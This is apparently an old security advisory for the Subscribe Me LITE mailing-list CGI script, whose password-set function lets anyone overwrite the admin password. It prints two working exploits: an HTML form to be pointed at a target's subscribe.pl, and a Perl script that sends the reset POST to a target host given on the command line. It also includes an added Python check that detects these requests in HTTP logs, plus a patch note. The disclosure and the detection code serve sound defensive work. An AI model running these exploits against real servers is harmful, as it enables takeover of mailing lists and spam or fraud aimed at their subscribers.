COMMAND

    Subscribe Me

SYSTEMS AFFECTED

    All versions, LITE edition only

PROBLEM

    'n30' found the following.  Yet again the script allows a remote
    user to overwrite the admin password file with any password they
    see fit, giving them admin access to the mailing-list script.

    Exploit:

    <html>
    <FORM ACTION="http://www.cgiscriptcenter.com/cgi-bin/subprodemo/subscribe.pl" METHOD="POST">
        <CENTER><BR>
        <TABLE BORDER="0" WIDTH="400">
          <TBODY>
          <TR>
            <TD>
    
            <P><B><FONT FACE="verdana, arial, helvetica"><FONT COLOR="#FF0000">Subscribe
              Me LITE</FONT> Status: Admin Password Set Vulnerability Exploit</FONT></B></P>
            <CENTER><FONT FACE="verdana, arial, helvetica"><FONT COLOR="#FF0000">n30</FONT></CENTER>
            <P><FONT SIZE="-1" FACE="verdana, arial, helvetica">Please enter the NEW Admin Pass: .</FONT></P>
            <CENTER>
            <TABLE BORDER="0">
              <TBODY>
              <TR>
                <TD ALIGN="RIGHT"><INPUT TYPE="PASSWORD" NAME="pwd"></TD>
                <TD><FONT SIZE="-2" FACE="verdana, arial, helvetica">password</FONT></TD>
              </TR>
              <TR>
                <TD ALIGN="RIGHT"><INPUT TYPE="PASSWORD" NAME="pwd2"></TD>
                <TD><FONT SIZE="-2" FACE="verdana, arial, helvetica">confirmation</FONT></TD>
              </TR>
              <TR>
                <TD ALIGN="CENTER"><BR>
                <INPUT TYPE="SUBMIT" NAME="setpwd" VALUE="  Set Password  "></TD>
                <TD><BR>
                <INPUT TYPE="RESET" NAME=""></TD>
              </TR></TBODY>
            </TABLE></CENTER></TD>
          </TR></TBODY>
        </TABLE>
    <FONT SIZE="1" FACE="verdana, arial, helvetica"><B><BR> To Use Modify Source To Point to subscribe.pl on TARGET Server <BR><BR><a href="mailto:n30@alldas.de">mail-me</a></CENTER></FORM>
    </html>

    teleh0r added the following code:

    #!/usr/bin/perl -w
    
    ## Subscribe Me Lite 2.0 exploit / www.cgiscriptcenter.com
    ## This exploit changes the administrator password and
    ## lets anyone take over the mailing list. You can send
    ## bogus e-mail to everyone on the list.
    ##
    ## May work on earlier versions, but not sure - not sure
    ## if it will work on the Professional version either.
    ##
    ## teleh0r@doglover.com / anno 2000
    ## httpd://teleh0r.cjb.net
    
    use strict;
    use Socket;
    
    if (@ARGV < 2) {
        print("Usage: $0 <target> <newpass>\n");
        exit(1);
    }
    
    my($target,$newpass,$crypt,$length,$command,
       $agent,$sploit,$iaddr,$paddr,$proto);
    
    ($target,$newpass) = @ARGV;
    
    $crypt = crypt($newpass, 'aa');
    $length = 34 + length($newpass);
    
    print("\nRemote host: $target\n");
    print("CGI-script: /cgi-bin/subscribe.pl\n");
    print("New password: $newpass / $crypt\n\n");
    
    $command = "pwd=$newpass&pwd2=$newpass&setpwd=++Set+Password++";
    $agent = "Mozilla/4.0 (compatible; MSIE 5.01; Windows 95)";
    
    $sploit=
    "POST /cgi-bin/subscribe.pl HTTP/1.0
    Connection: close
    User-Agent: $agent
    Host: $target
    Content-type: application/x-www-form-urlencoded
    Content-length: $length
    
    $command";
    
    $iaddr = inet_aton($target)                     || die("Error: $!\n");
    $paddr = sockaddr_in(80, $iaddr)                || die("Error: $!\n");
    $proto = getprotobyname('tcp')                  || die("Error: $!\n");
    
    socket(SOCKET, PF_INET, SOCK_STREAM, $proto)    || die("Error: $!\n");
    connect(SOCKET, $paddr)                         || die("Error: $!\n");
    send(SOCKET,"$sploit\015\012", 0)               || die("Error: $!\n");
    close(SOCKET);
    
    sleep(2);
    print("Check out: http://$target/cgi-bin/subscribe.pl\n");
    
    exit(0);
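
    For detection, the request both proofs of concept send can be matched in
    captured HTTP traffic (for example a proxy or WAF audit log). The check
    below is an added example, not part of the original advisory; the sample
    requests, host name and `email` field are constructed.

```python
from urllib.parse import parse_qs

SCRIPT_NAME = "subscribe.pl"               # script named in the advisory
RESET_FIELDS = {"pwd", "pwd2", "setpwd"}   # form fields both PoCs submit

# Constructed sample requests (host, password and e-mail field are made up).
BODY = "pwd=example&pwd2=example&setpwd=++Set+Password++"
SAMPLE_RESET = (
    "POST /cgi-bin/subscribe.pl HTTP/1.0\n"
    "Host: lists.example.test\n"
    "User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows 95)\n"
    "Content-length: 41\n\n" + BODY + "\r\n"
)
SAMPLE_OTHER = (
    "POST /cgi-bin/subscribe.pl HTTP/1.0\r\nHost: lists.example.test\r\n"
    "Content-Length: 23\r\n\r\nemail=user@example.test"
)


def parse_request(raw):
    """Split a raw HTTP request into (method, path, headers, body)."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    lines = head.split("\n")
    method, target, *_ = lines[0].split()
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method.upper(), target.split("?", 1)[0], headers, body.rstrip("\n")


def check_request(raw):
    """Return a finding for an admin password-set request, else None."""
    method, path, headers, body = parse_request(raw)
    if method != "POST" or path.rsplit("/", 1)[-1].lower() != SCRIPT_NAME:
        return None
    fields = parse_qs(body, keep_blank_values=True)
    if not RESET_FIELDS.issubset(fields):
        return None
    declared = headers.get("content-length", "")
    return {
        "path": path,
        "user_agent": headers.get("user-agent", ""),
        # The Perl PoC declares 34 + len(pass) but sends the password twice.
        "short_content_length": declared.isdigit() and int(declared) < len(body),
    }
```

    The finding deliberately leaves out the submitted password; compare each
    hit against the addresses your list administrators connect from.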

SOLUTION

    Patches are already available at the website; the download version
    is patched.